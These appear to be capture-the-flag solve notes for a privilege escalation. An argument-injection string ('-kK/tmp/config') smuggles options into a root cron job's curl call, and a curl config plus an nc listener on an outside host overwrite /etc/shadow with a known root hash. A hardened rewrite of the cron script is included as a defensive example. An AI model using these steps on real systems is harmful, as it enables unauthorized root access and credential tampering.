path: root/solve/notes
we get access to a brand new machine

we find that cron is the only other thing running besides dropbear for ssh

crontab reads configuration from /etc/cron.d/*, /etc/crontab and /var/spool/cron/

check the /etc crontab entries.. nothing special, can't read /var/spool/cron

search filesystem for config/domains.txt -> find /opt/scripts/request_certificates.sh

see that domains.txt is owned by root, but config folder is owned by us..
we can move the config folder and replace the file at that path with our own

place a domain that belongs to us in the file and wait... we get a HEAD request after ~1 min
=> the script is run every minute by an admin cronjob

#!/bin/bash

for file in /var/www/*; do
    echo "$file"
    if ([ -f $file/config/domains.txt ])
    then
        while IFS="" read -r p || [ -n "$p" ]
        do
            if ( dig "$p" | grep -q 'NXDOMAIN' ) || ( dig "$p" 2>&1 | grep -q 'Invalid' ) || ( dig "$p" | grep -q 'SERVFAIL' )
            then
                echo "[-] Error resolving the domain"
            else
                curl -I "$p"
                # certbot -d "$p"
            fi
        done < $file/config/domains.txt
    else
        echo "[-] Not a file"
    fi
done

there is a pre-check with dig we need to bypass, then we can inject command-line
arguments into curl..

one such argument is -Kconfig, which makes curl read further options from a config file

Next we need to prevent dig from reporting NXDOMAIN, 'Invalid' (a bad flag) or SERVFAIL (server unreachable) for the input arg

To do this we masquerade our curl options as an invalidly formatted dig option..

For this we prefix an option both utilities share.. -k! (keyfile for dig, insecure for curl)

Our final argument is then -kK/tmp/config

We can now inject arbitrary command-line arguments into the curl command running
as root by writing to /tmp/config.
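A hardened rewrite of the cron script, added here as a defender-side example (not the script from the box): every domains.txt line is validated as a hostname before dig or curl see it, curl gets `--` so a line can never be parsed as an option, and the file is only used when it is a root-owned regular file. The ownership check assumes GNU stat.

```shell
#!/bin/bash
# Hardened rewrite of the per-minute certificate script (added example).
# Each domains.txt line is untrusted: it must match a strict hostname
# pattern, so entries like -kK/tmp/config never reach dig or curl.

# Dot-separated labels of 1..63 alphanumerics/hyphens, no leading or
# trailing hyphen, 253 chars max. Returns 0 if the name is valid.
valid_domain() {
    d=$1
    [ ${#d} -ge 1 ] && [ ${#d} -le 253 ] || return 1
    printf '%s\n' "$d" | grep -Eq \
      '^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$'
}

# Print the valid entries of one domains file, one per line; blank lines
# and '#' comments are skipped, rejected lines are reported on stderr.
filter_domains() {
    while IFS= read -r p || [ -n "$p" ]; do
        case $p in ''|'#'*) continue ;; esac
        if valid_domain "$p"; then
            printf '%s\n' "$p"
        else
            printf '[-] Rejected malformed entry: %s\n' "$p" >&2
        fi
    done < "$1"
}

# Only trust a regular, non-symlink file owned by root (uid 0), so owning
# the parent config/ directory is not enough to swap the file. GNU stat.
trusted_file() {
    [ -f "$1" ] && [ ! -L "$1" ] && [ "$(stat -c %u "$1")" = 0 ]
}

run_all() {
    for dir in /var/www/*; do
        f=$dir/config/domains.txt
        trusted_file "$f" || { echo "[-] Skipping untrusted $f"; continue; }
        filter_domains "$f" | while IFS= read -r p; do
            # validated $p cannot start with '-', '+' or '@'; '--' ends curl options
            if dig "$p" 2>&1 | grep -Eq 'NXDOMAIN|SERVFAIL|Invalid'; then
                echo "[-] Error resolving $p"
            else
                curl -I -- "$p"
            fi
        done
    done
}
run_all
```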

The -I option is a pain, because we can't write response data directly to a file,
since -I makes curl omit the response body.

Looking around we find the dump-header option though.. this writes
the headers to a file. It isn't perfect, since the HTTP response status
line will be included too, but it's good enough.

Certain files like /etc/passwd, /etc/group and /etc/shadow are inherently
robust against a malformed line, since a single error could otherwise cause a system lockout..

We can use this to exchange the root password hash in /etc/shadow for
one that we know and use `su` to gain root privileges and read the flag.

For that we use the following config

url = "http://sinitax.com:9999"
dump-header = "/etc/shadow"

and on server side:

echo -e 'HTTP/1.1 200 OK\nroot:$y$j9T$WzLnIqCeKGPsZ99A/M6zG1$Z7ZqQY70qOzUdJKZ2ovpASps/NytHnPoeCVagQKvLO.:19796:0:99999:7:::\n' | nc -l 9999

This sets the root password to `test`.

And voila